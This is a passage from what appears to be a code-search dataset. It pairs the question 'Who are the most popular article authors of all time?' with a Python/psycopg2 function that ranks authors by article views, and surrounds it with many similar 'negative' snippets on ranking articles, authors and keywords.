key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def top_keywords(urls, count=10):\n try:\n res = Counter()\n for url in urls:\n res += Counter(get_keyword_dict(url))\n return [w[0] for w in res.most_common(count)]\n except:\n print('Error finding top keywords')", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def getMostPlausibleArticleClasses(aSoup, **kwargs):\n if 'minNbrOccurrences' in kwargs:\n regularMin = kwargs.get('minNbrOccurrences')\n # without this line, can cause TypeError for duplicate keyword argument error \n kwargs.pop('minNbrOccurrences')\n else:\n regularMin = 6\n #\n classes,nbrs = filterPossibleArticleRelatedClasses(aSoup, minNbrOccurrences=regularMin, **kwargs)\n try:\n # articles have the same classes for different tags in the hierarchy\n mostReccurentSetOfClassEff = statistics.mode(nbrs)\n except statistics.StatisticsError:\n _dNsEffs = effectif(nbrs)\n _ns = list(_dNsEffs)\n _effs = [_dNsEffs[key] for key in _ns]\n mostReccurentSetOfClassEff = _ns[_effs.index( max(_effs) )]\n articleRelatedClasses = [classes[i] for i,n in enumerate(nbrs) if n==mostReccurentSetOfClassEff]\n articleRelatedClassesOccurrences = [nbrs[i] for i,n in enumerate(nbrs) if n==mostReccurentSetOfClassEff]\n return articleRelatedClasses, articleRelatedClassesOccurrences", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def getBestStories(self):\n source = self.getSource(\"http://news.ycombinator.com/best\")\n stories = self.getStories(source)\n return stories", "def get_popular(lookups):\n return {k: lookups.link_counts[k] for k in lookups.movie_to_idx}", "def dashboard_content_article_tag_cloud():\n tag_stats = dict()\n past_30 = offset_time_past(30, str=True)\n articles = mongo.db[app.config['ARTICLES_COLLECTION']]\n results = articles.find({'collected': {'$gt': past_30}}, {'_id': 0})\n for result in results:\n for tag in result.get('tags', list()):\n tag_stats[tag] = tag_stats.get(tag, 0) + 1\n tags_sorted = sorted(tag_stats.items(), key=operator.itemgetter(1),\n reverse=True)[:50]\n data = list()\n for item in tags_sorted:\n data.append({'name': item[0], 'weight': item[1]})\n return jsonify(data)", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def count_words(all_articles):\n total_words = 0\n for title in all_articles:\n total_words += all_articles[title]['word-count']\n print(f\"There are {total_words} words written.\")", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n print_all_items_in_dict(author_count)", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def analyze(url):\n\n #Note : Using the function to count repeated words and sorted by value\n\n print('\\n\\nVisiting',url)\n print('The most 25 common word')\n print('\\n{:30} {:6}\\n'.format('Word','Count'))\n\n content = urlopen(url).read().decode()\n collector = Collector(url)\n collector.feed(content)\n urls = collector.getLinks()\n\n words_lst = collector.getdata()\n print(words_lst)\n # word_count = Counter(words_lst) # use collection\n # most_25_common = word_count.most_common(25) #\n\n word_count = frequency(words_lst)\n sorted_word_count = sorted(word_count.items(), key = lambda x : x[1],reverse= True)\n\n for word,count in sorted_word_count[:25]:\n print ('{:30}{:5}'.format(word,count))\n\n #return word_count\n\n # for word,count in most_25_common:\n # print('{:30} {:5}'.format(word,count))\n # return urls", "def article_stats(s_list,subject):\n word_dicts = {languages[0]:{},languages[1]:{}}\n stats = [subject]\n for i,article in enumerate(s_list):\n word_dicts[languages[i]] = get_words(article)\n wc = total_wc(word_dicts[languages[i]])\n stats.append((wc,avg_word_length(article, wc),avg_par_length(article)))\n stats.append(compute_similarity(word_dicts[languages[0]],word_dicts[languages[1]]))\n return stats", "def query1():\n\n print(\"1. What are the most popular three articles of all time? Which \" +\n \"articles have been accessed the most?\\n\")\n\n query = \"\"\"\n SELECT articles.title, subq.hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq\n ON subq.path LIKE '/article/'||articles.slug\n ORDER BY subq.hits DESC LIMIT 3;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Title: '{}' - {} views\".format(*j))", "def get_pybites_top_tags_using_feedparser(n=10):\n # TODO: For some reason this function gives one single false count:\n # All counts are according to the tests EXCEPT \"python\". This function\n # gives a count of 78, whereas the tests expect 79.\n # Opening the raw xml file in an editor we see indeed 79 matches for\n # \"<category>python</category>\".\n # Solution: rewrite the function to just do a text search like the text\n # editor. ^-^\n\n feed = feedparser.parse(content)\n tags_counter = Counter()\n for entry in feed.entries:\n for tag in entry.tags:\n tags_counter.update([tag.term])\n return tags_counter.most_common(n)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. {} - {:,} views\".format(i + 1, result[0], result[1]))", "def top_50():\r\n file_read = read_file()\r\n vacabulary_list = []\r\n for key in file_read:\r\n vacabulary_list.extend(file_read[key])\r\n top_50 = Counter(vacabulary_list).most_common(50)\r\n return (top_50)", "def popular():\r\n d = data_loader.vid_patient_tuples_dict\r\n most_popular_videos = []\r\n for k in sorted(d, key=lambda k: len(d[k]), reverse=True):\r\n most_popular_videos.append(k)\r\n return most_popular_videos", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def most_frequent_train(train_data):\n ### YOUR CODE HERE\n tags_counts_for_each_word = {}\n # Filling a dictionary from words and tag tags to their counters\n # Going over the words and counting their tags appearances\n for sentance in train_data:\n for word, tag in sentance:\n # If first time seeing word, adding it's tags count dictionary\n if word not in tags_counts_for_each_word:\n tags_counts_for_each_word[word] = {}\n # Fetching word tags count dictionary\n word_tags_count_dictionary = tags_counts_for_each_word[word]\n # If tag not in word's tags dictionary, initializing the counter\n if tag not in word_tags_count_dictionary:\n word_tags_count_dictionary[tag] = 0\n # Incrementing word tag counter\n word_tags_count_dictionary[tag] += 1\n \n words_maximal_tags = {}\n # Going over each word and finding it's maximal tag\n for word in tags_counts_for_each_word:\n # Fetching all word tags counts\n word_tags_count_dictionary = tags_counts_for_each_word[word]\n \n maximal_tag, maximal_tag_counter = '', 0\n # Finding word tag with maximal tag counter\n for curent_tag, current_counter in word_tags_count_dictionary.items():\n if current_counter > maximal_tag_counter:\n maximal_tag, maximal_tag_counter = curent_tag, current_counter\n \n # Setting the maximal tag for current word\n words_maximal_tags[word] = maximal_tag\n \n return words_maximal_tags\n ### END CODE HERE", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def get_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\t\ti = random.randint(0, articles.count()-1)\n\t\treturn articles, articles[i]", "def process_article(title):\n strings = []\n for lang in languages:\n strings.append(get_page(title,lang))\n return article_stats(strings,title)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). \\\n order_by('likes_count')", "def get_most_popular_talks_by_views(videos):\r\n return sorted(videos, key=lambda x: int(x.metrics['viewCount']), reverse=True)", "def top_by_ratings(self, n, metric=average):\n return top_movies", "def testArticleCount(self):\n\n self.articleCount(17)", "def top_python_questions(url=cached_so_url):\n content = load_page(url)\n soup = BeautifulSoup(content)\n questions = [(question.select_one('a.question-hyperlink').string.strip(),\n int(question.select_one('span.vote-count-post').string.strip()))\n for question in soup.find_all(class_='question-summary')\n if question.select_one('div.views').string.strip().endswith('m views')]\n return sorted(questions, key=lambda x: -x[1])", "def summary(self, *args, **kwargs):\n article = self.get_object()\n summary_data = self.get_serializer(article).data\n\n keywords = summary_data['keywords']\n related_articles = \\\n Article.objects.filter(Q(keywords__contains=keywords[:1])\n | Q(keywords__contains=keywords[1:2])\n | Q(keywords__contains=keywords[2:3])) \\\n .order_by('-publish_time')[:11] \\\n .values('identifier', 'title', 'images', 'site_name', 'domain', 'publish_time')\n\n related_articles = [related for related in list(related_articles)\n if related['identifier'] != article.identifier]\n\n summary_data['related'] = related_articles\n\n return Response(summary_data)", "def get_top_keywords_from_articles(self, kwords_list):\n _all_keywords = []\n for a in kwords_list:\n if a != []:\n for w in a:\n _all_keywords.append([w['keyword'],w['weight'],w['label']])\n _df_g = pd.DataFrame(_all_keywords, columns=[\"Keyword\", \"Count\",\"Label\"])\n _df_g.sort_values(by=\"Count\", inplace=True, ascending=False)\n _df_g.reset_index(drop=True, inplace=True)\n _df_g.to_csv('test.csv')\n print(len(_df_g))\n\n _df_g['Keyword'] = _df_g['Keyword'].apply(self.remove_repeat_words)\n _df_g.dropna(axis=0, inplace=True)\n p1,p2 = self.pos_taggers(_df_g)\n _df_g['c_POS'] = p1\n _df_g['s_POS'] = p2\n _df_g['c_POS_score'] = _df_g['c_POS'].apply(self.combine_pos_score)\n _df_g['s_POS_score'] = _df_g['s_POS'].apply(self.specific_pos_score)\n _df_g['Count'] = _df_g['Count'] + _df_g['c_POS_score'] + _df_g['s_POS_score'] \n print(len(_df_g))\n _df_g.sort_values(by='Count',inplace=True, ascending=False)\n print(len(_df_g))\n _df_g = _df_g.reset_index(drop=True)\n _df_g = _df_g[:10]\n response_dict = dict()\n response_dict['nc'] = \", \".join(_df_g['Keyword'].to_list())\n return response_dict", "def find_frequent_words(words, most_frequent): \n \n # common_words = Counter(sorted(words))\n # print common_words\n common_words = Counter(sorted(words)).most_common(most_frequent)\n print (common_words )\n most_common_words = [w for w, w_count in common_words]\n return most_common_words", "def get_top_news_and_the_rest(self):\n queryset = self.news.order_by('-marked', '-publication_date')\n return queryset.first(), queryset[1:]", "def most_words(self, n):\n return big_tags", "def get_pageranks(articles, skip_zeros=False, ambiguous_only=False, ambiguous_forms=set()):\n pageranks = {}\n pagerank_frequency=defaultdict(int)\n\n pr_uniq_sets=defaultdict(set)\n for article in articles:\n for mention in article.entity_mentions:\n if ambiguous_only and mention.mention not in ambiguous_forms:\n continue\n h=int(mention.gold_pr/1)\n if not skip_zeros or h!=0:\n pagerank_frequency[h]+=1\n pr_uniq_sets[h].add(mention.gold_link)\n pageranks[mention.gold_link]=h\n pr_uniq=defaultdict(int)\n for k,v in pr_uniq_sets.items():\n pr_uniq[k]=len(v)\n return pagerank_frequency, pr_uniq, pageranks", "def top_python_questions(url=cached_so_url):\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n ge_1m = []\n lt_1m = []\n\n question_summary = soup.find_all(\"div\", class_=\"question-summary\")\n for question in question_summary:\n views = int(question.find(\"div\", class_=\"views\").get(\"title\").split(\" \")[0].replace(\",\", \"\"))\n _question = question.find(\"a\", class_=\"question-hyperlink\").get_text()\n votes = int(question.find(\"span\", class_=\"vote-count-post\").get_text())\n \n if views >= 1000000:\n ge_1m.append((_question, votes))\n else:\n lt_1m.append((_question, votes))\n\n return sorted(ge_1m, key=lambda x: x[1], reverse=True)", "def get_relevant_articles_tf_idf(self, title, k):\n\n\n inner_product=0\n distances=list()\n for article in self.tf_idf:\n if not article==title:\n angle=self.angle_finder(self.tf_idf[title], self.tf_idf[article])\n distances.append((article, math.acos(angle)))\n distances=sorted(distances, key=lambda tup: tup[1])\n print (distances[:k])\n return distances[:k]", "def get_most_popular_talks_by_like_ratio(videos):\n return sorted(videos, key=get_ratio, reverse=True)", "def num_articles(self):\n\t\treturn len(index)", "def get_top_nationalities(result, n=5):\n nat_freq=pd.DataFrame(result['country'].value_counts())\n ratios=nat_freq[:n]/nat_freq.sum()*100\n res='The most common visitors are from'\n for i in range(0,len(ratios)):\n if i!=len(ratios)-1:\n res=res+f' {ratios.index[i]} ({np.round(ratios.country[i],2)}%),'\n else:\n res=res+f' and {ratios.index[i]} ({np.round(ratios.country[i],2)}%).'\n return res", "def get_top_featured_entries(number=5):\n return list(Entry.published.filter(featured=True)[:number])", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def top_by_num_of_ratings(self, n):\n return top_movies", "def _get_new_article(pages):\n date = arrow.now().replace(days=-30).format('YYYY-MM-DD')\n pages = [p for p in pages if p.created > date]\n\n skips = [p for p in pages if 'scp' in p.tags and p.rating >= 40]\n tales = [p for p in pages if 'tale' in p.tags and p.rating >= 20]\n goi = [p for p in pages if 'goi-format' in p.tags and p.rating >= 20]\n pages = skips + tales + goi\n\n return random.choice(pages) if pages else None", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def personal_top_three(scores):\n return sorted(scores, reverse=True)[:3]", "def personal_top_three(scores):\n return sorted(scores, reverse=True)[:3]", "def get_instance_distribution(articles, instance):\n references = defaultdict(int)\n for article in articles:\n for mention in article.entity_mentions:\n form=mention.mention\n meaning=mention.gold_link\n if meaning==instance:\n references[form]+=1\n return sorted(references.items(), key=lambda x: x[1], reverse=True)", "def get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))" ]
[ "0.7968826", "0.77808386", "0.7766518", "0.77630246", "0.7703104", "0.7636034", "0.7507648", "0.7505851", "0.74948984", "0.7427754", "0.74145854", "0.71255904", "0.71188134", "0.7111447", "0.7081126", "0.7029817", "0.69994766", "0.6986983", "0.69304246", "0.6920505", "0.6882535", "0.68230313", "0.67415947", "0.6712437", "0.66118187", "0.6596079", "0.65192574", "0.6506484", "0.6456639", "0.6433427", "0.64259905", "0.64207137", "0.6364805", "0.6324833", "0.629801", "0.6262481", "0.61925775", "0.6190417", "0.6179566", "0.6150143", "0.61290365", "0.6120968", "0.61168694", "0.6095613", "0.6053071", "0.6053071", "0.60371464", "0.60055846", "0.5970011", "0.5938313", "0.59339416", "0.59210694", "0.5919213", "0.59148544", "0.590489", "0.5862792", "0.5812729", "0.5808571", "0.5805504", "0.5796127", "0.57864845", "0.57820755", "0.5749477", "0.57468516", "0.57427174", "0.5729018", "0.57207364", "0.571516", "0.57127184", "0.56940734", "0.5668858", "0.5660749", "0.5658229", "0.5649712", "0.5647527", "0.5620981", "0.5620474", "0.5601826", "0.5591498", "0.55583394", "0.55423224", "0.55287135", "0.5520212", "0.55069286", "0.55037457", "0.54909277", "0.549083", "0.5481573", "0.547718", "0.5469407", "0.5459685", "0.5455319", "0.54517835", "0.5450417", "0.5448972", "0.5447352", "0.5432765", "0.5432765", "0.54296845", "0.5419315" ]
0.7005649
16
Who are the most popular article authors of all time?
def getPopualrAuthors(): db = psycopg2.connect("dbname=news") c = db.cursor() c.execute(" select count(*) as views , authors.name from articles " + " inner join " + "log on concat('/article/', articles.slug) = log.path " + " inner join authors on articles.author = authors.id " + "group by name order by views desc; ") authors = c.fetchall() db.close() return authors
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_popular_authors():\n print '2. The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. {} - {:,} views\".format(i + 1, result[0], result[1]))", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def print_popular_authors():\n print(\"\\nAuthors listed by article views:\\n\")\n views_data = get_query_results(AUTHORS_VIEWS_QUERY)\n author_row_format = '{} - {} views'\n for author, views in views_data:\n print(author_row_format.format(author, views))", "def top_authors(cursor):\n top_auth = 'No authors found.'\n try:\n cursor.execute(\"\"\"\n select name, hits\n from authors, views_by_id as views_by_id\n where id = author\n group by name, hits\n order by hits desc\"\"\")\n\n authors = cursor.fetchall()\n # If no authors were found, return\n if len(authors) <= 0:\n return top_auth\n\n except psycopg2.Error as e:\n print('Fetching authors by popularity: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any authors, return the results.\n else:\n top_auth = 'Top authors by article views: \\r\\n'\n for auth in authors:\n top_auth += ' {} - {} views\\r\\n'.format(auth[0], auth[1])\n return top_auth", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n print_all_items_in_dict(author_count)", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def print_authors(popular_authors):\n\n print('\\nThe list of authors being listed as per their popularity:\\n')\n for author in popular_authors:\n print(author[0] + '\\t-\\t' + str(author[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path \n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def recommend_for_new_user(titles=False, 